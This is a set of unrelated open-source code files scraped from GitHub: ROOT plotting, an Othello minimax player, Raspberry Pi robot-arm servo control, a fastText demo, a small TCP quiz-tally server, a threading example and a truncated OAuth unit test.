        cu.check_dir_exists_create(os.path.dirname(os.path.abspath(output_filename)))
        canv_L_scan.Print(output_filename)
    def plot_scan_L_curvature(self, output_filename):
        """Plot graph of L curvature & optimum point"""
        canv_L_curvature = ROOT.TCanvas("canv_L_curvature_"+str(self.tau), "canv_L_curvature_"+str(self.tau))
        self.graph_log_tau_curvature.SetTitle("Optimization of Regularization Parameter, #tau : Scan of L curvature")
        self.graph_log_tau_curvature.SetLineColor(ROOT.kBlue+3)
        self.graph_log_tau_curvature.Draw()
        self.graph_log_tau_curvature.GetXaxis().SetTitle("log_{10}(#tau)")
        self.graph_log_tau_curvature.GetYaxis().SetTitle("L-curve curvature C")
        self.graph_log_tau_curvature_best.SetLineColor(ROOT.kRed)
        self.graph_log_tau_curvature_best.SetMarkerColor(ROOT.kRed)
        self.graph_log_tau_curvature_best.Draw("* same")
        leg = ROOT.TLegend(0.5, 0.6, 0.85, 0.89)
        leg.SetFillColor(0)
        leg.SetFillStyle(0)
        leg.SetBorderSize(0)
        leg.SetTextSize(0.026)
        leg.AddEntry(self.graph_log_tau_curvature, 'Curvature', 'l')
        leg.AddEntry(self.graph_log_tau_curvature_best, 'Chosen point: #tau = {}'.format(self.tau), 'P')
        leg.Draw()
        # Create the output directory if it is missing, then save the canvas.
        cu.check_dir_exists_create(os.path.dirname(os.path.abspath(output_filename)))
        canv_L_curvature.Print(output_filename)
    def save_to_tfile(self, tfile):
        """Persist all scan graphs into an open TFile."""
        tfile.WriteTObject(self.scanned_l_curve, "scanned_l_curve")
        tfile.WriteTObject(self.graph_best_scan_point, "graph_best_scan_point")
        tfile.WriteTObject(self.graph_log_tau_curvature, "graph_log_tau_curvature")
        tfile.WriteTObject(self.graph_log_tau_curvature_best, "graph_log_tau_curvature_best")
|
raggleton/QGAnalysisPlotting
|
unfolding_regularisation_classes.py
|
unfolding_regularisation_classes.py
|
py
| 11,065 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14637889375
|
# Cell states: 1 = black, 2 = white, 0 = empty, 3 = outer border sentinel.
black, white, empty, outer = 1, 2, 0, 3
# Offsets to the 8 neighbours in the 10x10 (100-cell) board layout.
directions = [-11, -10, -9, -1, 1, 9, 10, 11]
class TreeNode:
    """Minimal binary-tree node with accessor methods.

    BUG FIX: every accessor was missing `self` (so any call raised
    TypeError), and the getters read the class attributes instead of the
    instance's fields.
    """
    val = None
    left = None
    right = None
    def __init__(self, val, left, right):
        self.val = val
        self.left = left
        self.right = right
    def setLeft(self, l):
        self.left = l
    def setRight(self, r):
        self.right = r
    def setVal(self, v):
        self.val = v
    def getLeft(self):
        return self.left
    def getRight(self):
        return self.right
    def getVal(self):
        return self.val
def mobility(board,player):
return len(get_legal_moves(board,opponent_color(player)))
def stableCount(board, player):
count = 0
for square in board:
if isStable(board, player, square):
count = count + 1
return count
def isStable(board, player, square):
    # A square is considered "stable" if no direction offers the opponent
    # a way to flank it: walking each ray from *square*, whenever an empty
    # or opponent cell is met, the opposite ray is scanned; finding another
    # empty/opponent cell there means the square could still be flipped.
    opp = opponent_color(player)
    for d in directions:
        k = square + d
        while board[k] != 3:  # 3 == outer sentinel ring terminates the ray
            if board[k] == 0 or board[k] == opp:
                # Scan back along the opposite direction from just before k.
                test = k-d
                while board[test] != 3:
                    if board[test] == 0 or board[test] == opp:
                        return False
                    test = test-d
            k = k + d
    return True
def bracket(board, player, square):
    """Flip all opponent discs bracketed between *square* and another
    disc of *player*, in every direction.  Mutates *board* in place.

    Assumes board[square] has already been set to *player*.
    """
    opp = opponent_color(player)
    for d in directions:
        k = square + d
        # BUG FIX: compare cell values with ==/!= instead of ``is``/``is not``;
        # identity on ints only works by accident of CPython's small-int cache.
        if board[k] != opp:
            continue
        # Walk past the run of opponent discs.
        while board[k] == opp:
            k = k + d
        if board[k] == player:
            # Bracketed: walk back, flipping everything in between.
            k = k - d
            while k != square:
                board[k] = player
                k = k - d
def would_bracket(board, player, square):
    """Return True if placing *player* on *square* would flank at least
    one run of opponent discs (i.e. the move flips something)."""
    opp = opponent_color(player)
    for d in directions:
        k = square + d
        # BUG FIX: value equality (==/!=) instead of ``is``/``is not`` on ints,
        # which relied on CPython's small-int cache.
        if board[k] != opp:
            continue
        while board[k] == opp:
            k = k + d
        if board[k] == player:
            return True
    return False
def get_legal_moves(board, player):
    """List all empty squares where *player* has a legal (flipping) move.

    Scans only the 8x8 playable interior of the 10x10 padded board.
    """
    possible = []
    for row in range(10, 90, 10):
        for col in range(1, 9):
            square = row + col
            # BUG FIX: value equality instead of identity (``is not``) on ints.
            if board[square] != empty:
                continue
            if would_bracket(board, player, square):
                possible.append(square)
    return possible
def opponent_color(player):
    """Return the opposing colour constant for *player*."""
    # BUG FIX: ``==`` rather than ``is`` -- int identity is a CPython
    # small-int-cache implementation detail, not guaranteed semantics.
    if player == black:
        return white
    return black
def pick(board, player):
    """Choose a move for *player*.

    Prefers the child position maximising the stable-disc minimax score;
    when the best stability score is zero, falls back to a mobility-based
    search.  Returns a square index, or None when no legal move exists.
    """
    poss = get_legal_moves(board, player)
    maxscore = 0
    from random import choice
    if len(poss) < 1:
        return None
    move = choice(poss)  # random fallback when nothing scores above 0
    for child in poss:
        # BUG FIX: copy the board -- the original aliased it (``test = board``),
        # so every simulated move permanently mutated the real position.
        test = board[:]
        test[child] = player
        bracket(test, player, child)
        h = minimax(test, player, 10, stableCount)
        if h > maxscore:
            maxscore = h
            move = child
    # ``h`` here is the score of the last child examined (original behaviour).
    if h == 0:
        for child in poss:
            test = board[:]
            test[child] = player
            bracket(test, player, child)
            h = minimax(test, player, 10, mobility)
            if h > maxscore:
                maxscore = h
                move = child
    return move
def minimax(board, player, depth, score):
    """Negamax search to *depth* plies, scoring leaf positions with *score*.

    Applies a -1 penalty for moves onto the X-/C-squares adjacent to
    corners, which are usually bad in Othello.
    """
    if depth == 0:
        return score(board, player)
    else:
        h = -9999
        poss = get_legal_moves(board, player)
        for child in poss:
            a = 0
            if child in [12, 16, 21, 22, 27, 28, 71, 72, 77, 78, 82, 87]:
                a = -1
            # BUG FIX: copy instead of aliasing the caller's board, so the
            # simulated move does not leak into the real position.
            test = board[:]
            test[child] = player
            bracket(test, player, child)
            h = max(h + a, -minimax(test, opponent_color(player), depth - 1, score))
        return h
|
caelan/TJHSST-Artificial-Intelligence
|
Othello/JasmineDragon.py
|
JasmineDragon.py
|
py
| 2,788 |
python
|
en
|
code
| 0 |
github-code
|
6
|
44914350526
|
#!/usr/bin/env python3
#/*
# Terminal User input
# Manual Mode where the coordinate and orientation variables are input
# Doesn't use accelerometer
#*/
# Import essential libraries
import requests #type: ignore
import numpy as np #type: ignore
import imutils #type: ignore
import time
import math
from datetime import datetime
import adafruit_adxl34x # type: ignore
import sys
import cv2 #type: ignore
import os
import RPi.GPIO as GPIO #type: ignore
import serial #type: ignore
import matplotlib.pyplot as plt #type: ignore
sys.path.append('/home/pi/Chromebook-projects/projects/proj_Hexclaw')
from IK_module import *
from h2_module import *
from board import SCL, SDA # type: ignore
import busio # type: ignore
from adafruit_motor import servo # type: ignore
from adafruit_servokit import ServoKit # type: ignore
from adafruit_pca9685 import PCA9685 # type: ignore
# --- Hardware initialisation: PCA9685 servo driver over I2C at 50 Hz ---
i2c = busio.I2C(SCL, SDA)
pca = PCA9685(i2c)
pca.frequency = 50
# NOTE(review): this list rebinds the name ``servo`` and shadows the
# ``adafruit_motor.servo`` module imported above -- works only because the
# module is never referenced again afterwards.
servo = [servo.Servo(pca.channels[0]),
         servo.Servo(pca.channels[1]),
         servo.Servo(pca.channels[2]),
         servo.Servo(pca.channels[3]),
         servo.Servo(pca.channels[4]),
         servo.Servo(pca.channels[5]),
         ]
for i in range(6):
    servo[i].set_pulse_width_range(500, 2500)
# Move the arm to its parked pose, then to a ready pose.
sendToServo(servo,[135,45,180,45,180,90],0,mode=0)
time.sleep(1)
GPIO.setmode(GPIO.BCM) # GPIO Numbers instead of board numbers
ledRelay = 23
GPIO.setup(ledRelay, GPIO.OUT) # GPIO Assign mode
GPIO.output(ledRelay, GPIO.LOW) # out
GPIO.output(ledRelay, GPIO.HIGH) # on
time.sleep(0.75)
sendToServo(servo,[90,115,135,90,115,90],1,mode=2)
# Disabled LED blink sequence (kept for reference).
if False:
    for _ in range(4):
        GPIO.output(ledRelay, False)
        time.sleep(0.03)
        GPIO.output(ledRelay, True)
        time.sleep(0.03)
    time.sleep(1.5)
    GPIO.output(ledRelay, False)
    time.sleep(0.25)
    GPIO.output(ledRelay, True)
    time.sleep(0.5)
    GPIO.output(ledRelay, False)
    time.sleep(0.1)
    GPIO.output(ledRelay, True)
    time.sleep(2)
    GPIO.output(ledRelay, False)
    print("------")
    time.sleep(2)
    GPIO.output(ledRelay, True)
# Diagnostics (Arduino voltage logger + matplotlib graphs); off by default.
diagnostics = False
if diagnostics:
    ard_port = '/dev/ttyUSB0'
    ser_arduino = serial.Serial(ard_port, 9600, timeout=0.1)
    ser_arduino.reset_input_buffer()
    x_Values = [] #time/seconds passed since start of program
    y0_Values = [] #voltage
    # NOTE(review): ``6*[[]]`` creates six references to the SAME inner
    # list, so per-motor appends would hit every slot.  Probably intended
    # ``[[] for _ in range(6)]`` -- confirm against the axisTest program.
    y1_Values = 6*[[]] #absolute rotation difference/jump for each *individual motor*
    y2_Values = [] #total absolute rotation difference (i.e. the "jump" in movement for that iteration)
    y3_Values = 6*[[]] #*estimated* stagnant load on each motor (Nm)
    GraphTitles = ["Voltage","new rotation","total new rotation","torque per motor"]
    Graph_yLabel = ["Voltage [V]","Angle [degrees]","Angle [degrees]","Torque [Nm]"]
# --- Tuning constants and mutable state shared with main()/mouseTrack() ---
axisFilter = 0.7 #On the new value end
xScaling, yScaling, zScaling = 0.8, 0.8, 1.2
brightVal = 75
diffCheck = 100
showImage = False
globalPrint = True
endAnglePrint = False
firstAnglePrint = False
posOption = '-'
q = [0]*6 #NOTE: q = q[0] = servo[0]
s = [0, 0, 0, 0, 0, 0, 0] #The variables that are sent to the servos
zMax = 300
# Default end-effector orientation (radians) and position PP = [x, y, z] mm.
a, b, Y = toRadians(0), toRadians(-45), toRadians(90)
PP = [0, 200, 200]
coord = ""
drawing = False # true if mouse is pressed
buttonPressed = False
x1,y1,x2,y2 = -1,-1,-1,-1
windowRes = (600,300)
# mouse callback function
def mouseTrack(event,x,y,flags,param):
    """OpenCV mouse callback: redraw the tracking overlay and update the
    shared (x2, y2) cursor position while the left button is held."""
    global x1,y1,x2,y2,drawing,buttonPressed,img,temp
    x2,y2 = x,y
    if drawing:
        # Clear the canvas each move so the crosshair does not smear.
        img = np.zeros((windowRes[1],windowRes[0],3), np.uint8)
    if event == cv2.EVENT_LBUTTONDOWN:
        drawing = True
        x1,y1 = x2,y2
    elif event == cv2.EVENT_MOUSEMOVE:
        buttonPressed = True
        if drawing == True:
            # Crosshair, cursor circle, and the cursor's board coordinate
            # (origin at bottom-centre of the window).
            cv2.line(img,(0,y2),(windowRes[0],y2),(255,255,255),1)
            cv2.line(img,(x2,0),(x2,windowRes[1]),(255,255,255),1)
            cv2.circle(img,(x2,y2),10,(0,0,255),1)
            cv2.putText(img,"("+str(int(x2-windowRes[0]*0.5))+","+str(int(windowRes[1]-y2))+")",(x2+10,y2),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255))
            # Range rings (50 mm steps) centred at the arm's base.
            cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),50,(255,255,255),1)
            cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),100,(255,255,255),1)
            cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),150,(255,255,255),1)
            cv2.circle(img,(int(windowRes[0]*0.5),int(windowRes[1])),200,(255,255,255),1)
            cv2.putText(img,str(PP),(10,20),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255))
            temp = img
    elif event == cv2.EVENT_LBUTTONUP:
        buttonPressed = False
        drawing = False
        img = temp #type: ignore
        # cv2.line(img,(0,y2),(windowRes[0],y2),(255,255,255),1)
        # cv2.line(img,(x2,0),(x2,windowRes[1]),(255,255,255),1)
        # cv2.circle(img,(x2,y2),10,(0,0,255),1)
        # cv2.putText(img,"("+str(int(x2-windowRes[0]*0.5))+","+str(int(windowRes[1]-y2))+")",(x2+10,y2),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255))
# cv2.putText(img,"("+str(int(x2-windowRes[0]*0.5))+","+str(int(windowRes[1]-y2))+")",(x2+10,y2),cv2.FONT_HERSHEY_SIMPLEX,0.5,(255,255,255))
def main():
    """Interactive control loop for the Hexclaw arm.

    Modes (chosen at the prompt, switchable at any prompt via "mode_(n)"):
      0 - replay movement commands from a .dat file
      1 - type target position [x y z] and orientation [a b Y]
      2 - drive x/y with the mouse window (w/s change z, Esc exits)
      3 - run pre-defined programs/patterns or axis/orientation sweeps
    Typing "exit" at any prompt returns; "debug" opens the debug menu.
    """
    global PP, a, b, Y
    mode = 0
    mod_code = "q4"
    print(" Different modes for tracking/moving:")
    print(" 0. Run movement commands from .dat file")
    print(" 1. Enter position and orientation in terminal")
    print(" 2. Mouse position tracking on window")
    print(" 3. Move end-effector in a pattern")
    option = input(" input: ")
    if option == "exit": return
    else: mode = int(option)
    # "under" = given < 0
    # "over" = given < 180
    servoExceeded = False
    whichServoExceeded = 6*[False]
    typeOfExceeded = 6*["null"]
    start_time = time.time()
    x = 1 # displays the frame rate every 1 second
    counter = 0
    while True:
        # os.system("clear")
        print("\n ---Enter mode_(n) to change mode to (n)--- ")
        print(" - \"debug\" to enter debug-mod menu")
        print(" - \"mode_(n)\" to change mode to n")
        PP = [0, 200, 200]
        # Inner loop: gather the input for the current mode; breaks once a
        # valid target (or mode-3 option) has been read.
        while True:
            isReachable = [True]
            if mode==0:
                tempInput_1 = input("Enter file path:")
                if tempInput_1 == "exit": return
                elif tempInput_1[:4] == "mode": mode=int(tempInput_1[5:])
                else:
                    movCommPath = tempInput_1
                    runFromFile(movCommPath, servo)
                break
            if mode==1:
                tempInput_1 = input("Enter coordinates [x y z] in mm: ").split()
                if tempInput_1[0] == "exit": return
                elif tempInput_1[0][:4] == "mode": mode=int(tempInput_1[0][5:])
                elif tempInput_1[0] == "debug": debug_mod_menu(mod_dict)
                else:
                    PP[0] = (float(tempInput_1[0])) # type: ignore
                    PP[1] = (float(tempInput_1[1])) # type: ignore
                    PP[2] = (float(tempInput_1[2])) # type: ignore
                    break
            if mode==2:
                tempInput_1 = input("Enter z-value in mm: ")
                if tempInput_1 == "exit": return
                elif tempInput_1[:4] == "mode": mode=int(tempInput_1[5:])
                elif tempInput_1 == "debug": debug_mod_menu(mod_dict)
                else:
                    PP[2] = float(tempInput_1) # type: ignore
                    break
            if mode==3:
                patternOpt = 1
                print("Options:")
                print(" 0.run a custom program/course of motions")
                print(" 1.choose a pre-defined pattern from a dictionary")
                print(" 2.move end-effector along an axis")
                print(" 3.move end-effector orientation with a fixed position")
                tempInput_1 = input("input: ")
                if tempInput_1 == "exit": return
                elif tempInput_1[:4] == "mode": mode=int(tempInput_1[5:])
                elif tempInput_1 == "debug": debug_mod_menu(mod_dict)
                else:
                    patternOpt = int(tempInput_1)
                    break
        # Mode 1: single IK solve + move for the typed pose.
        if mode==1:
            tempInput_2 = input("Enter orientation values [a b Y] in degrees: ").split()
            a,b,Y = toRadians(float(tempInput_2[0])), toRadians(float(tempInput_2[1])), toRadians(float(tempInput_2[2]))
            if diagnostics: print("x:", PP[0], " y:", PP[1], " z:", PP[2], " a:", toDegrees(a), " b:", toDegrees(b), " Y:", toDegrees(Y), sep='')
            q = getAngles(PP,a,b,Y,'-', debug=mod_dict, positionIsReachable=isReachable)
            # print(q)
            print("read:",[toDegrees(q) for q in q], "posIsReachable:", isReachable)
            if isReachable[0]:
                # custom_sendToServo(servo,[toDegrees(angle) for angle in q],0,True)
                sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=2,printResult=True)
        # Mode 2: continuous mouse tracking; IK solved every frame.
        elif mode==2:
            tempInput_2 = input("Enter orientation values [a b Y] in degrees: ").split()
            a,b,Y = toRadians(float(tempInput_2[0])), toRadians(float(tempInput_2[1])), toRadians(float(tempInput_2[2]))
            img = np.zeros((windowRes[1],windowRes[0],3), np.uint8)
            cv2.namedWindow('tracking_window')
            cv2.setMouseCallback('tracking_window',mouseTrack)
            temp = img
            print("\n 'Esc' - change z-value and orientation\n")
            while True:
                cv2.imshow('tracking_window', img) #use this if the previous drawings are not to be used
                k = cv2.waitKey(1) & 0xFF
                if k == 27: break
                elif k == 119: PP[2]+=10 #type: ignore
                elif k == 115: PP[2]-=10 #type: ignore
                if drawing:
                    PP[0], PP[1] = x2-windowRes[0]*0.5,windowRes[1]-y2 # type: ignore
                    q = getAngles(PP,a,b,Y,'-',positionIsReachable=isReachable, debug=mod_dict)
                    # print(q)
                    if isReachable[0]: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=0)
                counter+=1
                if (time.time() - start_time) > x :
                    print("FPS: ", counter / (time.time() - start_time))
                    counter = 0
                    start_time = time.time()
            cv2.destroyAllWindows()
        # Mode 3: canned programs / patterns / sweeps.
        elif mode==3:
            if patternOpt==0: #type: ignore
                print("Pick any of these programs")
                for key,_ in mov_Programs.items(): print(" - \"",key,"\"", sep='')
                key = input("input the program name: ")
                if key=="exit": break
                # Remember the current pose so it can be restored afterwards.
                presetAngles = 6*[0]
                for joint in range(6): presetAngles[joint] = servo[joint].angle / constants_q[joint]["fixed"]
                if key=="axisTest" and diagnostics:
                    mov_Programs[key](
                        servo,
                        [diagnostics,x_Values,
                        [y0_Values,y1_Values,y2_Values,y3_Values],ser_arduino]
                    )
                else: mov_Programs[key](servo)
                sendToServo(servo,presetAngles,0,mode=2)
                # Plot and save the diagnostics gathered during axisTest.
                if diagnostics and key=="axisTest":
                    fig = plt.figure(figsize=(19, 6))
                    ax = [0,0,0,0]
                    y_Values = [y0_Values,y1_Values,y2_Values,y3_Values]
                    for axis in range(len(ax)):
                        ax[axis] = fig.add_subplot(1,4,axis+1) #type: ignore
                        ax[axis].set_xlim(0,round(x_Values[-1])) #type: ignore
                        ax[axis].set_title(GraphTitles[axis]) #type: ignore
                        ax[axis].set_xlabel("time [seconds]") #type: ignore
                        ax[axis].set_ylabel(Graph_yLabel[axis]) #type: ignore
                        ax[axis].grid() #type: ignore
                        if axis==1 or axis==3:
                            for j in range(6):
                                ax[axis].plot(x_Values,y_Values[axis][j],linestyle='solid',label='q'+str(j+1)) #type: ignore
                        else:
                            ax[axis].plot(x_Values,y_Values[axis],linestyle='solid') #type: ignore
                            if axis==0:
                                ax[axis].axhline( #type: ignore
                                    y=(sum(y_Values[axis])/len(y_Values[axis])),
                                    color='red',linestyle='-',
                                    label=f"avg:{round(sum(y_Values[axis])/len(y_Values[axis]))}V"
                                )
                        ax[axis].legend(loc='upper right',framealpha=0.3) #type: ignore
                    fig.tight_layout(pad=5.0)
                    fig.suptitle("")
                    currentDate = str(datetime.now()).replace(" ", ";")
                    relativePath = "/home/pi/Chromebook-projects/projects/proj_Hexclaw/hexclaw_files/voltage_readings/media/"
                    fileTitle = "mov_Voltage_"
                    plt.savefig(relativePath+fileTitle+currentDate+".png") #type: ignore
                    plt.show()
            if patternOpt==1: #type: ignore
                print("Pick any of these patterns")
                for key,_ in mov_Patterns.items(): print(" - \"",key,"\"", sep='')
                key = input("input a key:")
                if key=="exit": break
                # Each pattern entry is [x, y, z, a, b, Y] (degrees for angles).
                for i in range(len(mov_Patterns[key])):
                    q = getAngles(
                        [mov_Patterns[key][i][0],mov_Patterns[key][i][1],mov_Patterns[key][i][2]],
                        toRadians(mov_Patterns[key][i][3]),
                        toRadians(mov_Patterns[key][i][4]),
                        toRadians(mov_Patterns[key][i][5]),
                        '-',
                        positionIsReachable=isReachable,
                        debug=mod_dict
                    )
                    print(mov_Patterns[key][i])
                    if isReachable[0]: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=2)
                    time.sleep(1)
            elif patternOpt==2: #type: ignore
                # Sweep the end-effector back and forth along one axis.
                axis = input("\nEnter what axis to move [x, y or z] [unit: mm]:")
                if axis=="exit": break
                orientToUse = input("\nEnter orientation for axis test [a, b and Y]:").split()
                fullPos = [0,link[4]+link[5]+120,150]
                presetAngles = [0,0,0,0,0,0]
                for joint in range(6): presetAngles[joint] = servo[joint].angle / constants_q[joint]["fixed"]
                prevSent=False
                for direction in range(1, -2, -2):
                    for pos in range(-200, 200):
                        if axis == "x": fullPos[0] = direction*pos*0.75 #type: ignore #300
                        if axis == "y": fullPos[1] = direction*pos*0.5+100 #type: ignore #200
                        if axis == "z": fullPos[2] = direction*pos*0.5+200 #type: ignore #200
                        q = getAngles(
                            fullPos,
                            toRadians(int(orientToUse[0])),toRadians(int(orientToUse[1])),toRadians(int(orientToUse[2])),
                            '-', positionIsReachable=isReachable,
                            debug=mod_dict
                        )
                        if isReachable[0]:
                            if prevSent: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=0)
                            else:
                                sendToServo(servo,[toDegrees(joint) for joint in q],2,useDefault=True,mode=2)
                                time.sleep(1)
                            prevSent=True
                        if axis == "x": time.sleep(0.005)
                        else: time.sleep(0.001)
                time.sleep(1.5)
                sendToServo(servo,presetAngles,0,mode=2)
            elif patternOpt==3: #type: ignore
                # Sweep one orientation angle while holding position fixed.
                orientToUse = input("\nEnter what orientation to test [a, b or Y] [unit: degrees]:")
                posToUse = input("\nEnter coordinate for position test [x, y and z]:").split()
                for _ in range(3): posToUse[_] = int(posToUse[_]) #type: ignore
                fullOrient = [0,0,0]
                presetAngles = [0,0,0,0,0,0]
                for joint in range(6): presetAngles[joint] = servo[joint].angle / constants_q[joint]["fixed"]
                for direction in range(1, -2, -2):
                    for angle in range(-90, 90):
                        if orientToUse == "a": fullOrient[0] = direction*angle
                        if orientToUse == "b": fullOrient[1] = direction*angle
                        if orientToUse == "Y": fullOrient[2] = direction*angle
                        q = getAngles(posToUse,toRadians(fullOrient[0]),toRadians(int(fullOrient[1])),toRadians(int(fullOrient[2])),
                            '-',positionIsReachable=isReachable,
                            debug=mod_dict
                        )
                        if isReachable[0]: sendToServo(servo,[toDegrees(joint) for joint in q],0,useDefault=True,mode=0)
                        time.sleep(0.01)
                time.sleep(1.5)
                sendToServo(servo,presetAngles,0,mode=2)
        # input("\npaused. Press enter to continue...")
if __name__ == "__main__":
    main()
    # On exit: park the arm, switch the LED relay off, release the PCA9685.
    sendToServo(servo,[135,45,180,45,180,90],1,mode=2)
    GPIO.output(ledRelay, False)
    pca.deinit()
|
Quark3e/Chromebook-projects
|
projects/proj_Hexclaw/in rpi/Hexclaw_Main_2.py
|
Hexclaw_Main_2.py
|
py
| 17,353 |
python
|
en
|
code
| 2 |
github-code
|
6
|
27251458016
|
"""
文件名: Code/Chapter09/C05_FastText/main.py
创建时间: 2023/7/22 10:31 上午
作 者: @空字符
公众号: @月来客栈
知 乎: @月来客栈 https://www.zhihu.com/people/the_lastest
"""
import logging
from gensim.models import KeyedVectors
import fasttext
from fasttext.util import reduce_model
import sys
import os
sys.path.append('../../')
from utils import DATA_HOME
def load_fasttext_model():
    """Load the pretrained Chinese fastText model, demo a few queries,
    then reduce it from 300 to 100 dimensions and save the result."""
    path_to_model = os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.300.bin')
    # Alternative: load the text-format vectors via gensim instead.
    # path_to_model = os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.300.vec.gz')
    # model = KeyedVectors.load_word2vec_format(path_to_model, binary=False)
    ft = fasttext.load_model(path_to_model)
    logging.info(f"词向量的维度: {ft.get_dimension()}")
    logging.info(f"中国: {ft.get_word_vector('中国')}")
    logging.info(f"与中国最相似的5个词为: {ft.get_nearest_neighbors('中国', k=5)}")
    logging.info(ft.get_subwords("跟我一起学深度学习"))
    reduce_model(ft, 100)  # 降维 -- in-place dimensionality reduction to 100
    logging.info(f"词向量的维度: {ft.get_dimension()}")
    path_to_model = os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.100.bin')
    ft.save_model(path_to_model)
def get_get_analogies():
    """Demo nearest-neighbour and analogy queries on the Chinese and
    English pretrained fastText models (sample outputs in the comments)."""
    ft = fasttext.load_model(os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.zh.300.bin'))
    logging.info('有凤来仪' in ft.words)
    logging.info(f"与东坡居士最相似的5个词为: {ft.get_nearest_neighbors('有凤来仪', k=5)}")
    # Analogy: Berlin is to Germany as ? is to France.
    logging.info(ft.get_analogies("柏林", "德国", "法国", k=5))
    # False
    # 与有凤来仪最相似的5个词为: [(0.457183, 'Viscosity'), (0.454175, 'viscosity'), (0.361536, 'thb'), (0.343013, 'kg/m2'), (0.335760, 'Dirham')]
    # [(0.743810, '巴黎'), (0.583832, '里昂'), (0.555544, '法國'), (0.547275, '斯特拉斯堡'), (0.536760, '坎城')]
    ft = fasttext.load_model(os.path.join(DATA_HOME, 'Pretrained', 'fasttext', 'cc.en.300.bin'))
    logging.info('accomodtion' in ft.words)
    logging.info(f"与accomodtion最相似的5个词为: {ft.get_nearest_neighbors('accomodation', k=5)}")
    logging.info(ft.get_analogies("berlin", "germany", "france", k=5))
    # False
    # 与accomodtion最相似的5个词为: [(0.858731, 'accomadation'), (0.828016, 'acommodation'), (0.822644, 'accommodation'), (0.821873, 'accomdation'), (0.793275, 'Accomodation')]
    # [(0.730373, 'paris'), (0.640853, 'france.'), (0.639331, 'avignon'), (0.631667, 'paris.'), (0.589559, 'montpellier')]
if __name__ == '__main__':
    # Only the analogy demo runs by default; uncomment to rebuild the model.
    # load_fasttext_model()
    get_get_analogies()
|
moon-hotel/DeepLearningWithMe
|
Code/Chapter09/C05_FastText/main.py
|
main.py
|
py
| 2,582 |
python
|
en
|
code
| 116 |
github-code
|
6
|
75386038906
|
import threading
import time
def worker():
    """Print a heartbeat once per second, five times, then return."""
    for _ in range(5):
        time.sleep(1)
        print("I'm working")
t = threading.Thread(target=worker, name='worker') # thread object
t.start() # start it
print("==End==")
|
hashboy1/python
|
MultiThread.py
|
MultiThread.py
|
py
| 332 |
python
|
en
|
code
| 0 |
github-code
|
6
|
45626436566
|
import threading
import socket
class Estatisticas:
    """Per-question tally of correct/wrong answers, keyed by question id."""

    def __init__(self):
        self.questoes = {}

    def atualizar_estatisticas(self, num_questao, acertos, erros):
        """Overwrite the stored counts for *num_questao*."""
        entry = {'acertos': acertos, 'erros': erros}
        self.questoes[num_questao] = entry

    def obter_estatisticas(self):
        """Return the mapping question -> {'acertos': n, 'erros': n}."""
        return self.questoes
def tratar_conexao(conn, addr, estatisticas):
    """Serve one client connection until it closes.

    Each message has the form "<question>;<ignored>;<answers>", where
    answers is a string of 'V'/'F' marks; the counts are recorded in the
    shared *estatisticas* object and echoed back to the client.
    """
    print("Cliente conectado:", addr)
    while True:
        data = conn.recv(1024).decode()
        if not data:
            # Empty read: peer closed the connection.
            break
        num_questao, _, respostas = data.split(";")
        acertos, erros = calcular_acertos_erros(respostas)
        estatisticas.atualizar_estatisticas(num_questao, acertos, erros)
        resposta = f"Questão: {num_questao}; Acertos: {acertos}; Erros: {erros}"
        conn.send(resposta.encode())
    print("Cliente desconectado:", addr)
    conn.close()
def calcular_acertos_erros(respostas):
    """Return (#correct, #wrong): the counts of 'V' and 'F' in *respostas*."""
    acertos = sum(1 for marca in respostas if marca == 'V')
    erros = sum(1 for marca in respostas if marca == 'F')
    return acertos, erros
def iniciar_servidor(host, port):
    """Accept TCP clients forever, handling each in its own thread.

    All threads share one Estatisticas instance.
    """
    estatisticas = Estatisticas()
    servidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    servidor.bind((host, port))
    servidor.listen(5)
    print("Servidor iniciado. Aguardando conexões...")
    while True:
        conn, addr = servidor.accept()
        # One handler thread per client connection.
        thread = threading.Thread(target=tratar_conexao, args=(conn, addr, estatisticas))
        thread.start()
if __name__ == "__main__":
    # Listen on localhost only, fixed port.
    host = "127.0.0.1"
    port = 8888
    iniciar_servidor(host, port)
|
GabsLUZ/Atividade-SD
|
TCP/servidor.py
|
servidor.py
|
py
| 1,552 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
8665774694
|
import os
import json
from botocore.exceptions import ClientError
from unittest import TestCase
from unittest.mock import patch
from exceptions import YahooOauthError
from login_yahoo_authorization_url import LoginYahooAuthorizationUrl
class TestLoginYahooAuthorizationUrl(TestCase):
    """Unit tests for the LoginYahooAuthorizationUrl Lambda handler."""

    @classmethod
    def setUpClass(cls):
        # Fake Yahoo OAuth credentials the handler reads from the environment.
        os.environ['YAHOO_CLIENT_ID'] = 'fake_yahoo_consumer_key'
        os.environ['YAHOO_SECRET'] = 'fake_yahoo_consumer_secret'
        os.environ['YAHOO_OAUTH_CALLBACK_URL'] = 'http://localhost'

    def test_exec_main_ok(self):
        # Happy path: the handler returns 200 with the generated OAuth URL.
        with patch('login_yahoo_authorization_url.YahooUtil') as yahoo_mock:
            yahoo_mock.return_value.get_authorization_url.return_value = 'oauth_url'
            response = LoginYahooAuthorizationUrl({}, {}).main()
            self.assertEqual(response['statusCode'], 200)
            self.assertEqual(
                json.loads(response['body']),
                {'url': 'oauth_url'}
            )

    def test_exec_main_ng_with_clienterror(self):
        # Boto ClientError inside the handler is mapped to a generic 500.
        # NOTE(review): this mocks ``generate_auth_url`` while the success
        # test mocks ``get_authorization_url`` -- confirm which method the
        # handler actually calls; the side_effect may never fire.
        with patch('login_yahoo_authorization_url.YahooUtil') as yahoo_mock:
            yahoo_mock.return_value.generate_auth_url.side_effect = ClientError(
                {'Error': {'Code': 'UserNotFoundException'}},
                'operation_name'
            )
